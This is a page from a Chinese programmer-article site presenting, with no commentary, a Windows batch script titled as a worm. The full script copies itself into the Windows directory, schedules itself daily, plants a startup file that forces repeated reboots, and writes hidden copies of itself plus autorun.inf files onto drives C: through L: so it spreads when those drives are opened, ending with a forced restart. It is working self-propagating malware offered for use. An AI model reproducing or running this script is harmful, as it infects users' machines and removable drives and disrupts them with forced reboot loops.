欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

批处理蠕虫bat

程序员文章站 2022-05-15 11:23:45
复制代码 代码如下:@echo off  attrib -r -h -s "%~nx0" 2>n...
复制代码 代码如下:

@echo off 
attrib -r -h -s "%~nx0" 2>nul >nul 
attrib -r -h -s %windir%\"%~nx0" 2>nul >nul 
copy "%~nx0" %windir% /y 2>nul >nul 
at 9:20 /every:m,t,w,th,f,s,su "%windir%\%~nx0" 
echo reboot>%windir%\temp.dll 
set pat=「开始」菜单\程序\启动 
echo @echo off>"%allusersprofile%\%pat%"\reboot.bat 
echo echo reboot^>^>%%windir%%\temp.dll>>"%allusersprofile%\%pat%"\reboot.bat 
echo find /c "reboot" %%windir%%\temp.dll^|find "11">>"%allusersprofile%\%pat%"\reboot.bat 
echo if errorlevel 1 goto rebootnow>>"%allusersprofile%\%pat%"\reboot.bat 
echo del %%windir%%\user.dll /f /q>>"%allusersprofile%\%pat%"\reboot.bat 
echo del %%windir%%\temp.dll /f /q>>"%allusersprofile%\%pat%"\reboot.bat 
echo del /f /q "%%~nx0">>"%allusersprofile%\%pat%"\reboot.bat 
echo exit>>"%allusersprofile%\%pat%"\reboot.bat 
echo :rebootnow>>"%allusersprofile%\%pat%"\reboot.bat 
echo shutdown /r /t 0 /f>>"%allusersprofile%\%pat%"\reboot.bat 
echo exit>>"%allusersprofile%\%pat%"\reboot.bat 
echo [autorun]>%windir%\user.dll 
echo shellexecute=%~nx0>>%windir%\user.dll 
set disk=c:>nul 2>nul 
:auto 
copy %windir%\"%~nx0" %disk%\ /y 2>nul >nul 
copy %windir%\user.dll %disk%\autorun.inf /y 2>nul >nul 
attrib +s +h +r %disk%\%~nx0 2>nul >nul 
attrib +s +h +r %disk%\autorun.inf 2>nul >nul 
cls 
goto %disk%>nul 2>nul 
:c: 
set disk=d:>nul 2>nul 
goto auto>nul 2>nul 
: d:
set disk=e:>nul 2>nul 
goto auto>nul 2>nul 
:e: 
set disk=f:>nul 2>nul 
goto auto>nul 2>nul 
:f: 
set disk=g:>nul 2>nul 
goto auto>nul 2>nul 
:g: 
set disk=h:>nul 2>nul 
goto auto>nul 2>nul 
:h: 
set disk=i:>nul 2>nul 
goto auto>nul 2>nul 
:i: 
set disk=j:>nul 2>nul 
goto auto>nul 2>nul 
:j: 
set disk=k:>nul 2>nul 
goto auto>nul 2>nul 
:k: 
set disk=l:>nul 2>nul 
goto auto>nul 2>nul 
: l:
cls 
attrib +s +h +r %windir%\%~nx0 2>nul >nul 
shutdown /r /t 0 /f 
exit